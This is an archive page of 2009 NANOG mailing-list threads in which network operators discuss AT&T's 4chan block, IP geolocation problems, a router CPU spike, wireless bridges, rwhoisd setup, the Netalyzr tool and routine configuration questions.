Re: ATT. Layer 6-8 needed.
On Mon, Jul 27, 2009 at 1:37 AM, Shon Elliott s...@unwiredbb.com wrote: Chris, Have you even read any of the other posts on here. I fade in and out I have been talking about spoofed packets in this thread multiple times. man engrish I do know what it is. I would appreciate you not making stupid comments like that. As was stated before, this isnt about you In other news, it looks like ATT is quietly removing filters from cities. Chicago still showing down
Re: ATT. Layer 6-8 needed.
Shon wrote: Seth, I said it could be, not that it is. Thanks for pointing that out. However, I believe the reason they are being blocked at ATT is the main reason I supplied on my first post. The DDoS attack issue is the main ticket here. The ACK storms arent coming from the 4chan servers It's just like the DNS attack (IN/NS/.). It points to the stupidity of ATT uppers SANS: Are you or arent you soliciting data? I have some to confirm also It's not because of content, or to piss people off. It's to protect their network, as any of you would do when you got DDoSed on your own networks. They are going to get some first hand experience in what Protecting their Network involves real soon, now. Blocking 4chan was an exercise in Stupidity It's damage control, It's a damage challenge. essentially, until they find out who is involved and block them, then they'll likely lift the block. They don't have the right to do this. Not in their TOS/EULA/User-Agreement. Not in any sane legal forum. (I*A*AL) This ISN'T the first time this has happened. Exactly. Now you see the problem ?
Re: ATT. Layer 6-8 needed.
Uh. You posted on Twitter. The most trusted name in [?] On Mon, Jul 27, 2009 at 12:17 AM, John Bambenek bambe...@gmail.com wrote: We'll take data from **Trusted** sources. I'm just not going to take a public open mailing list post as evidence at this point. chris rollin wrote: Shon wrote: Seth, I said it could be, not that it is. Thanks for pointing that out. However, I believe the reason they are being blocked at ATT is the main reason I supplied on my first post. The DDoS attack issue is the main ticket here. The ACK storms arent coming from the 4chan servers It's just like the DNS attack (IN/NS/.). It points to the stupidity of ATT uppers SANS: Are you or arent you soliciting data? I have some to confirm also It's not because of content, or to piss people off. It's to protect their network, as any of you would do when you got DDoSed on your own networks. They are going to get some first hand experience in what Protecting their Network involves real soon, now. Blocking 4chan was an exercise in Stupidity It's damage control, It's a damage challenge. essentially, until they find out who is involved and block them, then they'll likely lift the block. They don't have the right to do this. Not in their TOS/EULA/User-Agreement. Not in any sane legal forum. (I*A*AL) This ISN'T the first time this has happened. Exactly. Now you see the problem ?
Re: questionable email filtering policies?
On 23/07/09 22:22, goe...@anime.net wrote: Seems rather unwise to filter your abuse mailbox. - The following addresses had permanent fatal errors - ab...@btopenworld.com (reason: 554 Message not allowed - UP Email not accepted for policy reasons. Please visit http://help.yahoo.com/help/us/mail/defer/defer-04.html [120]) -Dan On the topic of mail rejection I have come across a few sites that reject mail, even to postmaster@, from domains that have one or more ipv6-only MX records listed (i.e. a domain name with but no A record(s)). The common factor seems to be mimedefang.
Re: Recommendations for Hong Kong datacenter, and a sanity check for my geopolitical conclusions ?
Making every effort to not pimp my employer (pccw), I would say that the Equinix in HK is good and they have a decent equinix direct product (one bill to pay). If you're looking more for a managed colo, pccw owns powerbase which does that sort of thing. HKCOLO is good but space is hard to come by. On 7/24/09, George Sanders gosand1...@yahoo.com wrote: I will be expanding a small network infrastructure service (read: DNS and mail ... a few 1u and 2u servers) to Hong Kong next year. We don't have any particular customer base in Hong Kong - rather, we have customers all over southeast asia and would like to serve them better, as well as attract more SE Asia customers. I chose Hong Kong for the following reasons: - South Korea is alternately happy with / upset with Japan, and I don't want to deal with that - Japan is is alternately happy with / upset with South Korea, and I don't want to deal with that - Mainland China is out of the question, for obvious reasons - The smaller (Thailand, Vietnamese, Phillipines, etc.) countries all have their own particular issues (recent coup in Thailand, etc.) So the choice came down to Hong Kong or Singapore, and I chose Hong Kong because it seems easier to just get things done there. I realize that in the long term there is a greater risk of social paradigm shift in Hong Kong because of mainland China, but in the short run it seems that Hong Kong is more functional than Singapore. Any comments on the above thought process ? The obvious follow-up is, which datacenter ? I need a full service center that will give me rackspace and let me just plug ethernet into their switch. I am not interested in brokering my own connectivity, nor am I interested in running my own routers. I want to pay one bill to one organization and get one cable. The end. I think there are further considerations though ... I read details of one very modern, very sexy datacenter housed in a skyscraper, but my research showed me that this building has been built on land reclaimed from the sea, and there is reasonable concern that the sand underpinnings could liquify, to a degree, in a seismic event. I'd also like to be more than a few feet above sea level. Honestly, as sexy as it would be to be in a slick tower right on the bay in Central Hong Kong, I would much rather find some nondescript, one story building, miles from the coast and a few hundred feet above sea level. What recommendations might someone have ? Thank you very much for any comments or suggestions you may have. -- Sent from Gmail for mobile | mobile.google.com
Re: Issues accessing hulu.com from new(ish) US range
Thanks to all that contacted me offlist and on, I believe it should be sorted shortly in all the relevant databases. Thanks again, Chris
Issues accessing hulu.com from new(ish) US range
Would someone from hulu.com please contact me offlist? Alternatively, if anyone has contact details for a vaguely clueful person there, that would be appreciated. We had a new range allocated to us by ARIN around 6 months ago for our US business, and hulu are claiming it's non-us. Our guess is that it's a canned response by first-line support. Also, does anyone happen to know which geolocation databases hulu use? Thanks, Chris
Re: Issues accessing hulu.com from new(ish) US range
ML wrote: Chris Taylor wrote: Would someone from hulu.com please contact me offlist? Alternatively, if anyone has contact details for a vaguely clueful person there, that would be appreciated. We had a new range allocated to us by ARIN around 6 months ago for our US business, and hulu are claiming it's non-us. Our guess is that it's a canned response by first-line support. Also, does anyone happen to know which geolocation databases hulu use? Thanks, Chris Did you Swip the block? https://www.arin.net/resources/request/reassignments.html Pretty certain we've done this. It wasn't myself that did it, but if I'm reading that page correctly, it updates the whois database, and that returns our US company details. Also, ip2location.com and ipinfodb.com both report a selection of IP's in the range to be US IP's. Thanks, Chris
Re: Issues accessing hulu.com from new(ish) US range
Frank Bulk - iName.com wrote: A few others I would check: - Akamai (you can contact them via their web page, but there are also people on this listserv that can check, too) - Google (if their search pages comes up in American English, you're good to go, otherwise there's info in their help that will let you fill out a form) - MaxMind (there's a contact form on their web page) Contact me offline if you want a list of (more minor) GeoIP sites I have bookmarked. Frank Thanks for that Frank. I've had contacts from Akamai and a couple of others off-list now. I've also checked MaxMind - their database appears to be up to date as well. I can't check Google at this second, as I'm based in the UK - I'll be setting something up for such tests tonight or tomorrow, but I seem to remember that we've previously spoken to them about it. Thanks, Chris -Original Message- From: Chris Taylor [mailto:chris.tay...@sohonet.co.uk] Sent: Wednesday, July 15, 2009 3:51 AM To: nanog@nanog.org Subject: Issues accessing hulu.com from new(ish) US range Would someone from hulu.com please contact me offlist? Alternatively, if anyone has contact details for a vaguely clueful person there, that would be appreciated. We had a new range allocated to us by ARIN around 6 months ago for our US business, and hulu are claiming it's non-us. Our guess is that it's a canned response by first-line support. Also, does anyone happen to know which geolocation databases hulu use? Thanks, Chris -- Chris Taylor Engineer Sohonet Limited 60 Poland Street London W1F 7NT t +44 (0)2072926909 m +44 (0)7919897978 f +44 (0)2072926901
Re: Point to Point Ethernet
Once upon a time, Ricky Beam jfb...@gmail.com said: Ethernet is cheap because it's everywhere, and built into almost everything. (however, the likes of Cisco and Juniper still charge insane amounts for line cards, be they ethernet, T1, or OC48.) Given the choice of buying a $4k DS3 card or just plugging into an existing, builtin ethernet port, which do you think most people will choose? Also, if you are plugging in a lower-speed link, you can plug ethernet in a $1000 switch and trunk it to a router, while a mux for T1/T3/OCx circuits costs a lot more. -- Chris Adams cmad...@hiwaay.net Systems and Network Administrator - HiWAAY Internet Services I don't speak for anybody but myself - that's enough trouble.
Re: Using twitter as an outage notification
On 04/07/09 17:07, Roland Perry wrote: That's the kind of marketing-led response I was hoping to hear. But the UK National Rail system now uses Tweets to tell customers about disruptions on the trains, and several major UK government departments and news organisations use it for announcements and Breaking News. So has it become respectable yet? When there are open-source equivalents available (e.g. Laconica, OpenMicroBlogger - both of which incidentally are compatible since they are based upon the OMB spec), I do wonder why a commercial or government entity would use a closed-source, non-domestic service.
QNET protocl ID 006A
I am looking for any information on QNET protocol ID 006A traffic...Our 7604
spikes to 100% every hour and 30 sec'sand I am seeing this trafficany
help on this would be appreciated
NEOVERTIKA.7604#sh proc cpu hist
1111221211
68647809388388
100
90
80
70
60
50
40
30 ** *
20 **
10 **
051122334455
0505050505
CPU% per second (last 60 seconds)
1
2043535434343233434332345353343353633543426336
8033127794325960220499555465375507850545124033097221386492
100 *
90 *
80 *
70 **
60 ** * * * *
50 * * ** *** * * * * ** *
40 #* * ** * * * ** *** * ** * * * **
30 *#**#***#**#***#* ***#**#*
20 ##
10 ##
051122334455
0505050505
CPU% per minute (last 60 minutes)
* = maximum CPU% # = average CPU%
111 1 11 11 1 11 111111 111 11 1 1
000909009009099009780009569000900090090909
000909009009099009080009889000800090090909
100 **
90 ** *
80 ** *
70 *
60 **
50 **
40 **#**#
30 #**##*****
20 ######***##**###**
10 ##
051122334455667.
0505050505050
CPU% per hour (last 72 hours)
* = maximum CPU% # = average CPU%
Packets look like this:
--- dump of outgoing inband packet ---
interface IB0/0, routine draco2_ibc_soutput
dbus info: src_vlan 0x0(0), src_indx 0x387(903), len 0x7C(124)
bpdu 0, index_dir 0, flood 0, dont_lrn 1, dest_indx 0x0(0)
00020008 A800 0387 7C00
mistral hdr: req_token 0x0(0), src_index 0x387(903), rx_offset 0x30(48)
requeue 0, obl_pkt 0, vlan 0x0(0)
destmac 00.00.00.00.00.00, srcmac 00.18.74.2C.75.C0, protocol 006A
layer 3 data: 0300 000C0113 FF00FF00 0201
0387 0380 0812
--- dump of outgoing inband packet ---
interface IB0/0, routine draco2_ibc_soutput
dbus info: src_vlan 0x0(0), src_indx 0x387(903), len 0x7C(124)
bpdu 0, index_dir 0, flood 0, dont_lrn 1, dest_indx 0x0(0)
00020008 A800 0387 7C00
mistral hdr: req_token 0x0(0), src_index 0x387(903), rx_offset 0x30(48)
requeue 0, obl_pkt 0, vlan 0x0(0)
destmac 00.00.00.00.00.00, srcmac 00.18.74.2C.75.C0, protocol 006A
layer 3 data: 0300 000C0113 FF00FF00 0201
0387 0380 0819
V/r
Thanks in advance,
Chris Ledford
NOC ATOG Engineer
CCNA/CCSP/CVOICE
A+/NET+/SEC+/LINUX+/MCPe
Connexion Technologies
Office:1240 Commerce Drive, Suite A
Gulf Shores, AL 36542
Mailing: P O Box 1245
Gulf Shores, AL 36547pan
NOC: 251-224-0662
P | 251.224.0972 or 251-224-0800 ext 65071
F | 251.224.0830
C | 251.923.8340
E | chris.ledf...@cnxntech.commailto:chris.ledf...@cnxntech.com
[cid:image001.gif@01C9F89A.F85609D0]http://www.facebook.com/home.php?#/pages/connexion-technologies/104131026647?ref=mf
[cid:image002.gif@01C9F89A.F85609D0] http://twitter.com/cnxntech
[cid:image003.gif@01C9F89A.F85609D0]http://www.cnxntech.com
Connexion Technologies is the service mark and trade name of Capitol
Infrastructure, LLC.
Confidentiality Notice: The material in this e-mail is intended only for the
use
Re: NANOG Digest, Vol 17, Issue 51
Cisco aironet ...reliable and the ony way to go ... Chris ledford CCNA CCSP CWLSS --Original Message-- From: nanog-requ...@nanog.org To: nanog@nanog.org ReplyTo: nanog@nanog.org Subject: NANOG Digest, Vol 17, Issue 51 Sent: Jun 18, 2009 9:23 AM Send NANOG mailing list submissions to nanog@nanog.org To subscribe or unsubscribe via the World Wide Web, visit http://mailman.nanog.org/mailman/listinfo/nanog or, via email, send a message with subject or body 'help' to nanog-requ...@nanog.org You can reach the person managing the list at nanog-ow...@nanog.org When replying, please edit your Subject line so it is more specific than Re: Contents of NANOG digest... Today's Topics: 1. Wireless bridge (Peter Boone) 2. Re: Wireless bridge (Jared Mauch) 3. Re: WISP NMS recommendations (Patrick Shoemaker) 4. Re: Wireless bridge (Joe Tyson) 5. Re: Wireless bridge (Chuck Anderson) 6. Re: Wireless bridge (Roy) 7. Re: Wireless bridge (Curtis Maurand) 8. Re: Wireless bridge (Joel Jaeggli) -- Message: 1 Date: Thu, 18 Jun 2009 09:05:56 -0400 From: Peter Boone na...@aquillar.com Subject: Wireless bridge To: nanog@nanog.org Message-ID: 005c01c9f015$852ae490$8f80ad...@com Content-Type: text/plain; charset=us-ascii Hi NANOG, I'm looking for some equipment recommendations for a wireless bridge between two locations approximately 500-800 meters apart. The current setup for this company has been extremely unstable and slow. I don't have a lot of experience in this area so I was hoping someone could give me a few pointers. Currently, both locations are using Linksys WRT54GL's flashed with DD-WRT firmware (Yes, 802.11g. All extra bells and whistles are disabled in the firmware. They were set up for WDS so other wireless clients could connect to the same access point, with varying degrees of success. Not very important). They are connected to SmartAnt 2300-2500 MHz 14 dBi directional antenna mounted on the roof (extended pretty high for perfect line of sight). I'm not sure when they got these antenna exactly but I'm told it was when WiFi was very new. The network is very small so both locations share the same subnet (192.168.1.0/24). They have gone through numerous Linksys access points over the years. The wireless settings are tweaked as best as possible, and we have found the connection to be most stable when the TX is limited to 6-9 Mbps. We have explored other options as well. An internet connection at each location + VPN is out due to very slow upstream speeds (the buildings are in an industrial area, ADSL is the only option.) The max they offer on regular business accounts is 800 kbps up. T1 lines are even slower and even more expensive. They won't offer us any other solutions such as fibre. We have considered running fibre/coax but there is too much construction activity and other property in the way. I'm looking into RouterBOARD right now, considering a RB433AH and R52H wireless card, but I'm not sure this will actually solve the problem. It's difficult to determine if the issue is with the antennas or access points (for example, after a good thunderstorm, the wireless link will be down for at least 12 hours, but will fix itself eventually. Resetting either access point will keep the link down for at least 30 minutes. Using an airgun on the access points tends to make them more reliable, even if they are clean and dust free. From the admin interface, each access point will report seeing a very good and strong signal from the other, yet they refuse to communicate until they feel like it a few hours later.) Any suggestions welcome. I'm sure you can tell cost is a bit of a factor here but it will be easy for me to justify a higher price if I'm confident it will be effective. While I'm at it, I've been reading along on the list for over a year now; thanks everyone for sharing your real world experiences :) Peter -- Message: 2 Date: Thu, 18 Jun 2009 09:18:24 -0400 From: Jared Mauch ja...@puck.nether.net Subject: Re: Wireless bridge To: Peter Boone na...@aquillar.com Cc: nanog@nanog.org Message-ID: 20090618131824.ga25...@puck.nether.net Content-Type: text/plain; charset=us-ascii On Thu, Jun 18, 2009 at 09:05:56AM -0400, Peter Boone wrote: Hi NANOG, I'm looking for some equipment recommendations for a wireless bridge between two locations approximately 500-800 meters apart. The current setup for this company has been extremely unstable and slow. I don't have a lot of experience in this area so I was hoping someone could give me a few pointers. I've had good luck with Cisco Aironet gear running in repeater mode. I've done the cheap linksys thing as well and it just did not work as well as using some equipment that was better designed. I have actually found the non-IOS software on the aironet 350/340 to be more
Re: Verio taking twitter down during Iran Election Riots?
What's interesting is that the !NANOG part of the universe presumes the maintenance was to be performed by Twitter, not by their carrier (i.e. server, not network, upgrades). Given the fact that the WhaleFail has become a commonly-recognizable sight, I can see this make people a bit, um, nervous. The real impact of the maintenance would have most likely been minimal short of a Murphy strike. That said, kudos to NTT for backing off in the face of some pretty momentous current events, and hope the delay doesn't cause too many ripple-effect problems for them. -C On Jun 16, 2009, at 10:48 AM, Jack Bates wrote: Erik Fichtner wrote: And yet, all upgrades can be postponed with the right... motivation. Hmmm, you do know that motivation may have strictly been, Your maintenance corresponds with a major event, can you put it off for a day? The maintenance in question has obviously been marked critical by NTTA with what appears to be short notification and limiting the delay to a minimum. They may have been unaware of the event and its importance to their customers. I'm more curious about what maintenance they are actually performing. I know they run mixed Cisco/Juniper, and all their Junipers should be able to handle in service upgrades. Of course, even switching hits of an upgrade warrants setting a maintenance window and notification due to Murphy. Jack
Re: Rwhoisd solution?
Do you have a link to the information on how to get that setup? ---Chris On Jun 10, 2009, at 1:05 PM, Chris Stone wrote: Can someone please point me in the direction of an rwhoisd solution to be run on a CentOS Linux platform? ARIN is now punting rwhois queries to us and frankly i've been unable to find an easy to install/use solution to answer these queries. I've seen the rwhoisd at projects.arin.net but the documentation on it is ghastly to say the least. If you use IPPlan to manage your IP allocations, it comes with a whois daemon that'll automagically use the information from your IPPlan sql database. Chris
Re: ICSI Netalyzr launch
On Fri, Jun 12, 2009 at 09:43, Randy Bushra...@psg.com wrote: sure, we need a privacy policy that can be arbitrarily changed with no ... previous ... notice just as we have for ... ... everything !!! exactly. so was the question a troll, a red herring, or just a rant? randy I guess it was just a rant, I like to know more specifically how folks intend to use data before I hand it over - and I like that promise to be at least theoretically enforceable. I am far from a lawyer but it is my understanding that an official pp is much more substantive and binding than a single FAQ answer -- especially in the eyes of the FTC. Yes policies can be changed but I can follow those changes and stop using the service/tool/etc if I don't like the changes. If you are saying that the policy can be changed after the fact to allow uses of the data for purposes or in manners other than those originally stated, I think you are wrong, see the 2004 case between the FTC and Gateway Learning as one example I know of off hand: Howard Beales, Director of the FTC’s Bureau of Consumer Protection. “You can change the rules but not after the game has been played.” (http://www.ftc.gov/opa/2004/07/gateway.shtm) I will grant you that in this case the data being collected is probably not that sensitive, but the access to my computer is - to me at least. I for one would have used the tool immediately had there been an acceptable PP or other TOS in place but without it I hesitate... So I figured I would bring it up. ~Chris PS - if you are interested in TOS related stuff, might be worthwhile to check out http://www.tosback.org/timeline.php a new project launched by the EFF (no affiliation, just fyi)
Re: ICSI Netalyzr launch
On Fri, Jun 12, 2009 at 11:03, Randy Bushra...@psg.com wrote: sure, we need a privacy policy that can be arbitrarily changed with no ... previous ... notice just as we have for ... ... everything !!! exactly. so was the question a troll, a red herring, or just a rant? If you are saying that the policy can be changed i am saying all this is specious. if you don't like it, don't use it. i have been using vern's stuff for 15 years or so, and trust him vastly more than i trust 94.3% of all the other services you trust. randy Probably so and it was not my intention to attack Vern, Berkley, ICIR nor infer that they were not trustworthy. Just pointing out a possible place for improvement from my view. ~Chris
Re: Rwhoisd solution?
I used this guide and it worked quite well. The writer was using FreeBSD but I installed onto Ubuntu and ran into little to no issues. http://www.unixadmin.cc/rwhois/ ---Chris On Jun 6, 2009, at 10:37 AM, Jeffrey Lyon wrote: NANOGers, Can someone please point me in the direction of an rwhoisd solution to be run on a CentOS Linux platform? ARIN is now punting rwhois queries to us and frankly i've been unable to find an easy to install/use solution to answer these queries. I've seen the rwhoisd at projects.arin.net but the documentation on it is ghastly to say the least. Hopefully someone knows of an easier solution or at least a tutorial somewhere? -- Jeffrey Lyon, Leadership Team jeffrey.l...@blacklotus.net | http://www.blacklotus.net Black Lotus Communications of The IRC Company, Inc. Look for us at HostingCon 2009 in Washington, DC on August 10th - 12th at Booth #401.
Re: Rwhoisd solution?
Can someone please point me in the direction of an rwhoisd solution to be run on a CentOS Linux platform? ARIN is now punting rwhois queries to us and frankly i've been unable to find an easy to install/use solution to answer these queries. I've seen the rwhoisd at projects.arin.net but the documentation on it is ghastly to say the least. If you use IPPlan to manage your IP allocations, it comes with a whois daemon that'll automagically use the information from your IPPlan sql database. Chris
Re: ICSI Netalyzr launch
On Tue, Jun 9, 2009 at 16:51, v...@ee.lbl.gov wrote: Folks, you might be interested in checking out a network monitoring tool we launched today, Netalyzr. It's a Java applet you can run by surfing to netalyzr.com. It aims to measure a bunch of the properties of and end user's network access, particularly looking for transparent modifications (e.g., hidden proxies), connectivity restrictions, and some security issues (e.g., whether the DNS resolver is vulnerable to the Kaminsky attack). We've had several thousand users run it today so far, so you may be hearing about reports your customers have gotten from it. You can see a sample report at: http://netalyzr.icsi.berkeley.edu/restore/id=example-session - Vern Why no privacy policy? Or am I just partially blind? Is an answer in a FAQ legally binding? ~Chris -- Chris Grundemann weblog.chrisgrundemann.com www.twitter.com/chrisgrundemann www.coisoc.org
Re: Multi site BGP Routing design
Once upon a time, Steve Bertrand st...@ibctech.ca said: Unless someone else has any better advice (I'm sure they do), you will need two separate public ASNs. Site 1 advertises it's space out of AS1, and site 2 advertises it's space from AS2. I don't know that it's better advice, but another way to link the two sites is via a tunnel (GRE or IPIP). Use the upstream IP on each router as the local endpoint, and then run some routing protocol over the tunnel. -- Chris Adams cmad...@hiwaay.net Systems and Network Administrator - HiWAAY Internet Services I don't speak for anybody but myself - that's enough trouble.
Re: Fiber cut - response in seconds?
Once upon a time, Deepak Jain dee...@ai.net said: Which is why, if you have a satellite, you often position DIRECTLY over the antenna you are sending to Unless your target is on the equator, you don't position a satellite directly over anything. -- Chris Adams cmad...@hiwaay.net Systems and Network Administrator - HiWAAY Internet Services I don't speak for anybody but myself - that's enough trouble.
Re: Fiber cut - response in seconds?
Once upon a time, Deepak Jain dee...@ai.net said: I promise you that that is not the case for all applications. Geosynchronous satellites can be anywhere. For the applications you are considering (communications mostly), equatorial orbit is the most advantageous. Geosynchronous are only over a particular longitude. They move up and down in latitude, so it isn't over a given point except twice per day (or only once at the extremes). -- Chris Adams cmad...@hiwaay.net Systems and Network Administrator - HiWAAY Internet Services I don't speak for anybody but myself - that's enough trouble.
Re: In a bit of bind...
On 01.06.2009, at 12:59, Ben Matthew wrote: Finally I've managed to successfully configure BIND 9 as a slave to a myDNS server and the AXFR transfers seem to be working fine. This strikes me as being quite a nice balance of ease of use and reliability in case myDNS fails on me. Ok I appreciate it doesn't get around security concerns but hey ho. As far as as security, why have myDNS world-reachable at all? You can have bind feed off of myDNS without having anyone on the outside ever talk to the myDNS backend. Chris
Re: Packet loss statistics
The Internet2 network publishes 10-second data for all interfaces on both its backbone network and the individual racklans in each of its cities: Backbone: http://dc-snmp.grnoc.iu.edu/i2net/ Racklans: http://dc-snmp.grnoc.iu.edu/i2net-hp/ Default graphs don't show errors. You need to create a custom graph and click the appropriate checkbox. If you want to view a large number of interfaces with their errors on a single page, you can create a Custom View that includes errors for any number of selected interfaces. -Chris On May 28, 2009, at 12:03 PM, Ric Messier wrote: Is anyone aware of useful resources for packet loss over large LANs and WANs? Google turned up a nice statistics page for Qwest's network but not much else that seems useful to me. Our testing teams are trying to simulate expected network conditions and rather than go overboard, having something close to real-world parameters would be nice. Thanks! Ric Chris Robb, Internet2 Manager of Operations O: 812.855.8604 C: 812.345.3188 ESCC/Internet2 Joint Techs July 19-23, 2009 - Indianapolis, Indiana http://jointtechs.es.net/indiana2009/
Re: Why choose 120 volts?
Once upon a time, Joe Greco jgr...@ns.sol.net said: And I don't like not having anywhere to plug in my power screwdriver's recharger... I suppose I should see if I can find someplace that has a transformer of an appropriate size, or does anyone already have the part number for something that can provide a few hunderd milliamps of 120V from 208? :-) Isn't 208V usually provided as a connection across two phases of a 3 phase circuit? In that case, you get 120V by going between one phase and neutral (no transformer required). You need a NEMA 14 (4 wire) connector to get two phases, neutral, and ground (provides 1 208V circuit and/or 2 120V circuits) or a NEMA L21 (5 wire) connector to get all three phases, neutral, and ground (provides 3 208V circuits and/or 3 120V circuits). -- Chris Adams cmad...@hiwaay.net Systems and Network Administrator - HiWAAY Internet Services I don't speak for anybody but myself - that's enough trouble.
IXP BGP timers (was: Multi-homed clients and BGP timers)
What's the BCP for BGP timers at exchange points? I imagine if everyone did something low like 5-15 rather than the default 60-180, CPU usage increase could be significant given a high number peers. Keeping in mind that bgp fast-external-failover is of no use at an exchange since the fabric is likely to stay up when a peer has gone down, and BFD would need to be negotiated peer-by-peer, is there a recommendation other than the default 60-180? Would going below 60-180 without first discussing it with your peers, tend to piss them off? Chris
Re: QWEST outage in the Southeast
Once upon a time, Bobby Kuzma bku...@electronerdz.com said: Does anybody have any information on this? I've had 4 customers on Qwest for Internet connectivity in Florida drop off the net within a few minutes of each other. I'm have Qwest via Atlanta and I'm not seeing any issues. -- Chris Adams cmad...@hiwaay.net Systems and Network Administrator - HiWAAY Internet Services I don't speak for anybody but myself - that's enough trouble.
two interfaces one subnet
Hi, This is a pretty moronic question, but I've been searching RFC's on- and-off for a couple of weeks and can't find an answer. So I'm hoping someone here will know it offhand. I've been looking through RFC's trying to find a clear statement that having two interfaces in the same subnet does not work, but can't find it that statement anywhere. The OS in this case is Linux. I know it can be done with clever routing and prioritization and such, but this has to do with vanilla config, just setting up two interfaces in one network. I would be grateful for a pointer to such an RFC statement, assuming it exists. Thanks! Chris
Re: two interfaces one subnet
On 11.05.2009, at 22:34, Patrick W. Gilmore wrote: On May 11, 2009, at 4:29 PM, Chris Meidinger wrote: I would be grateful for a pointer to such an RFC statement, assuming it exists. Why would an RFC prohibit this? Most _implementations_ do, but as far as network rules in general it is a valid configuration. That was essentially my conclusion as well: logically it can't work, but I wasn't certain where it might be forbidden. Thusly did I come to NANOG with the question, thinking smarter people than I might know. If it's completely down to implementation, or really to the interaction between TCP and underlying IP, then so be it. I was hoping that I might just not have thought of the right place to look. On 11.05.2009, at 22:39, Mikael Abrahamsson wrote: On Mon, 11 May 2009, Chris Meidinger wrote: I've been looking through RFC's trying to find a clear statement that having two interfaces in the same subnet does not work, but can't find it that statement anywhere. I don't know if it still works, but it did in Linux little over 10 years back. Proxy-arp:ed all the IPs in the /27 in the /24 and everything was fine (legacy reasons plus radiolink which I didn't want to run a lot of broadcasts over). There are legitimate cases where you might want to do this. Yes, I've gotten it to work as well as little as 10 days ago, but it's not something that $random_customer should be doing as a matter of practice. Thus, again, my hope that I just wasn't thinking of the right place to look to find an IETF recommendation against doing so. Thanks for the input! Chris
Re: two interfaces one subnet
On 11.05.2009, at 23:00, Charles Wyble wrote: What does two interfaces in one subnet mean? Two NICs? Or virtual interfaces? Two NICs, as in physical interfaces.
Re: two interfaces one subnet
On 11.05.2009, at 23:19, Alex H. Ryu wrote: Unless you configure Layer 2 for two interfaces, it's not going to work. It is invalid from networking principle. If you have to send the traffic for host in same subnet you configured, which interface it should send out ? Basically it may create broadcast storm loop by putting two ip addresses in same subnet in different interface. It may be allowed from host-level, but from router equipment, I don't think it was allowed at all. Alex, I _personally_ know that it's a problem. I was hoping for an RFC- reference, or similar standards document, to show to customers to convince them to stop trying to hack things to make it work. Chris
Re: two interfaces one subnet
On 11.05.2009, at 23:31, Dan White wrote: Chris Meidinger wrote: Hi, This is a pretty moronic question, but I've been searching RFC's on- and-off for a couple of weeks and can't find an answer. So I'm hoping someone here will know it offhand. I've been looking through RFC's trying to find a clear statement that having two interfaces in the same subnet does not work, but can't find it that statement anywhere. The OS in this case is Linux. I know it can be done with clever routing and prioritization and such, but this has to do with vanilla config, just setting up two interfaces in one network. I would be grateful for a pointer to such an RFC statement, assuming it exists. If your goal is to achieve redundancy or to increase bandwidth, you can bond the interfaces together - assuming that you have a switch / switch stack that supports 802.3ad. Then you could assign multiple IPs to the bonded interface without any layer 3 messyness. I should have been clearer. The case in point is having two physical interfaces, each with a unique IP, in the same subnet. For example, eth0 is 10.0.0.1/24 and eth1 is 10.0.0.2/24, nothing like bonding going on. The customers usually have the idea of running one interface for administration and another for production (which is a _good_ idea) but they want to do it in the same subnet (not such a good idea...) Chris
Re: two interfaces one subnet
On 11.05.2009, at 23:42, Kevin Oberman wrote: Date: Mon, 11 May 2009 16:19:56 -0500 From: Alex H. Ryu r.hyuns...@ieee.org Unless you configure Layer 2 for two interfaces, it's not going to work. It is invalid from networking principle. If you have to send the traffic for host in same subnet you configured, which interface it should send out ? Basically it may create broadcast storm loop by putting two ip addresses in same subnet in different interface. It may be allowed from host-level, but from router equipment, I don't think it was allowed at all. Alex I am a bit baffled as to why people think: 1. It won't work 2. It is a bad thing to do if it would work Neither is true. If it is two separate interfaces with two MAC addresses, it will work fine IF one of the interfaces is configured with a netmask of 255.255.255.255 (/32). Of course, you will have to add routes for the second interface if you expect to source traffic from it, but it really in not rare. This is, of course, how I've done it at times in the past. Routing management can, however, become quite a pain over time. The customer expectation is, naturally, that any traffic related to a connection that comes in to the first interface should go back out that interface, and anything related to a connection that came into the second interface should go back out there. (All this without any specific routing etc.) I think we both know that that's not going to happen automagically. Chris
Re: Why is www.google.cat resolving?
On 05.05.2009, at 09:33, Seth Mattinen wrote: Tim Tuppence wrote: Hello, I am seeing that www.google.cat resolves from three different networks. It even resolves from here: http://www.squish.net/dnscheck/ What is going on? Why are you expecting it not to? I think the real question here is why does schroedingers.cat not resolve, and who will be the first person able to jump through the requisite hoops make it do so.
Re: ground control to TWTelecom
On Mon, May 4, 2009 at 11:57, Jon Lewis jle...@lewis.org wrote: Seems like we were just here, but yet again, I'm having trouble verifying you're accepting a customer route (a different one than last week), and since sending me a copy of our prefix filter was apparently too much to ask, and you make it so easy to talk on the phone with anyone who knows what BGP is, here we are. Perhaps I'll track down our sales person and chew their ear. -- Jon Lewis | I route Senior Network Engineer | therefore you are Atlantic Net | _ http://www.lewis.org/~jlewis/pgp for PGP public key_ I assume you checked route-server.twtelecom.net for the route? -- Chris Grundemann weblog.chrisgrundemann.com
Intel wants to hook 15 billion embedded devices to the Internet in 6 years
Oddly, none of the courses in the event discuss IPv6. http://www.intelembeddedevent.com/ Intel® Embedded eVent We’re standing at the forefront of the Embedded Internet Era. The opportunities are yours. The networked world is growing at a tremendous pace. In just six years, it’s expected that 15 Billion intelligent devices will be connected to the internet. And, with your imagination and hard work, Intel can be a part of many of the devices that will revolutionize the way we work, talk, play and move. So, Intel is hosting our first virtual tradeshow, the Intel Embedded eVent, and we want you to join us! It’s a one day event that will showcase Intel technologies and our customers’ innovation in intelligent, connected devices.
Re: [quagga-users 10587] bgpd crash - apologies (fwd)
On Mon, 4 May 2009, Ingo Flaschberger wrote: -- Forwarded message -- Date: Mon, 04 May 2009 00:38:54 +0300 From: Geert Jan de Groot geertjan.degr...@xs4all.nl To: quagga-us...@lists.quagga.net Subject: [quagga-users 10587] bgpd crash - apologies Hello, I learned today that a BGP announcement for which I am the tech-c, is causing difficulties with Quagga. First of all, I apologise; it's only today that I heard about these difficulties. [...] A fix is here: https://www.caputo.com/foss/quagga-0.99.10-BGP-4-byte-ASN-bug-fixes.patch https://www.caputo.com/foss/quagga-0.99.11-BGP-4-byte-ASN-bug-fixes.patch (the patches are identical. naming is just for clarity.) Chris
Re: 10-GigE for servers
Once upon a time, Alex Thurlow a...@blastro.com said: As long as it's not a single connection that you're looking to get over 1Gb, etherchannel should actually work. It uses a hash based on (I believe) source and destination IP and port, so it should roughly balance connections between the servers. That depends on the devices on each end. For example, some switches can only hash on MAC addresses, some can look at IPs, and some can look at ports. -- Chris Adams cmad...@hiwaay.net Systems and Network Administrator - HiWAAY Internet Services I don't speak for anybody but myself - that's enough trouble.
Re: Important New Requirement for IPv4 Requests [re impacting revenue]
